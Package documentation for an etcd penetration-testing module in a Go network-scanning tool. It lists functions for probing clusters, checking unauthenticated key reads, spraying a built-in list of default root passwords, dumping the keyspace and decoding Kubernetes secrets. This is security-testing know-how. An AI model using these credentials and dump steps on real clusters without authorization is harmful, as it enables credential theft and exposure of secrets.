etcd

package

v0.0.185 Latest Latest Go to latest Published: Jun 12, 2026 License: Apache-2.0 Imports: 17 Imported by: 0

Details

Valid go.mod file
Redistributable license
Tagged version
Stable version
Learn more about best practices

Repository

github.com/Method-Security/networkscan

Links

Open Source Insights

Documentation ¶

Index ¶

Variables
func ConnectEtcdPublic(ctx context.Context, target, username, password string, timeoutMs int) (bool, string, error)
func NormalizeTarget(raw string) string
func PerformAuth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*pentestfern.AuthResult, error)
func PerformDump(ctx context.Context, target, token string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdDumpResult, error)
func PerformK8sDecode(ctx context.Context, target string, dumpResult *etcdfern.EtcdDumpResult, ...) (*etcdfern.EtcdK8SDecodeResult, error)
func PerformProbe(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdProbeResult, error)
func PerformReadUnauth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdReadResult, error)
func RunPentest(ctx context.Context, config *etcdfern.PentestEtcdConfig) (*etcdfern.PentestEtcdReport, error)
type Target
- func ParseTarget(raw string) (*Target, error)
- func (t *Target) FormatTarget() string

Constants ¶

This section is empty.

Variables ¶

View Source

var DefaultCredentials = []struct{ User, Pass string }{
	{"root", "root"},
	{"root", "etcd"},
	{"root", ""},
	{"root", "password"},
	{"root", "admin"},
	{"etcd", "etcd"},
}

DefaultCredentials contains the most common lazy etcd root passwords. etcd auth is opt-in; when enabled, root is the only privileged account.

Functions ¶

func ConnectEtcdPublic ¶

func ConnectEtcdPublic(ctx context.Context, target, username, password string, timeoutMs int) (bool, string, error)

ConnectEtcdPublic returns (success, message, err) for spray integration.

func NormalizeTarget ¶

func NormalizeTarget(raw string) string

NormalizeTarget parses a raw target string and returns the canonical form. Returns the raw string unchanged if parsing fails.

func PerformAuth ¶

func PerformAuth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*pentestfern.AuthResult, error)

PerformAuth tests each username+password against the etcd authenticate endpoint. Captures the JWT bearer token on success.

func PerformDump ¶

func PerformDump(ctx context.Context, target, token string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdDumpResult, error)

PerformDump performs a paginated keyspace dump via POST /v3/kv/range. If token is non-empty, it is sent as a Bearer token (authenticated dump).

func PerformK8sDecode ¶

func PerformK8sDecode(ctx context.Context, target string, dumpResult *etcdfern.EtcdDumpResult, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdK8SDecodeResult, error)

PerformK8sDecode decodes k8s-encoded etcd entries. Kubernetes stores objects in etcd with a "k8s\x00" magic prefix followed by a protobuf-encoded Unknown wrapper. This function extracts readable fields from the payload using key path parsing and heuristic string extraction. It is only called when K8S_DECODE is in the requested action list; the DecodeKubernetesSecrets config field reflects whether the operator explicitly opted in via --decode-kubernetes-secrets (for reporting purposes), but the actual decode always runs when this function is invoked.

func PerformProbe ¶

func PerformProbe(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdProbeResult, error)

PerformProbe retrieves server/cluster version, member list, and k8s inference via the etcd HTTP gateway.

func PerformReadUnauth ¶

func PerformReadUnauth(ctx context.Context, target string, config *etcdfern.PentestEtcdConfig) (*etcdfern.EtcdReadResult, error)

PerformReadUnauth checks whether etcd allows unauthenticated key enumeration via the canonical "count all keys" probe: POST /v3/kv/range with key="\x00" range_end="\x00" count_only=true.

func RunPentest ¶

func RunPentest(ctx context.Context, config *etcdfern.PentestEtcdConfig) (*etcdfern.PentestEtcdReport, error)

RunPentest performs etcd pentest operations using a phased approach: PROBE (always) -> READ_UNAUTH -> AUTH -> DUMP -> K8S_DECODE based on requested actions. ClusterEndpoints in the config are appended as additional targets (deduped).

Types ¶

type Target ¶

type Target struct {
	Host string
	Port int
}

Target holds a parsed etcd host:port.

func ParseTarget ¶

func ParseTarget(raw string) (*Target, error)

ParseTarget parses "host[:port]" into a Target. Accepts IPv4, IPv6 (bare ::1 or bracketed [::1]:port), and plain hostnames. Bare strings with no port are treated as the host with the default etcd port (2379). Uses utils.ParseHostPort so that out-of-range ports (>65535) fall back to the default rather than being accepted as-is.

func (*Target) FormatTarget ¶

func (t *Target) FormatTarget() string

FormatTarget returns a canonical "host:port" string using utils.FormatHostPort so that IPv6 addresses are correctly bracketed (e.g. [::1]:2379).

Source Files ¶

View all Source files

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL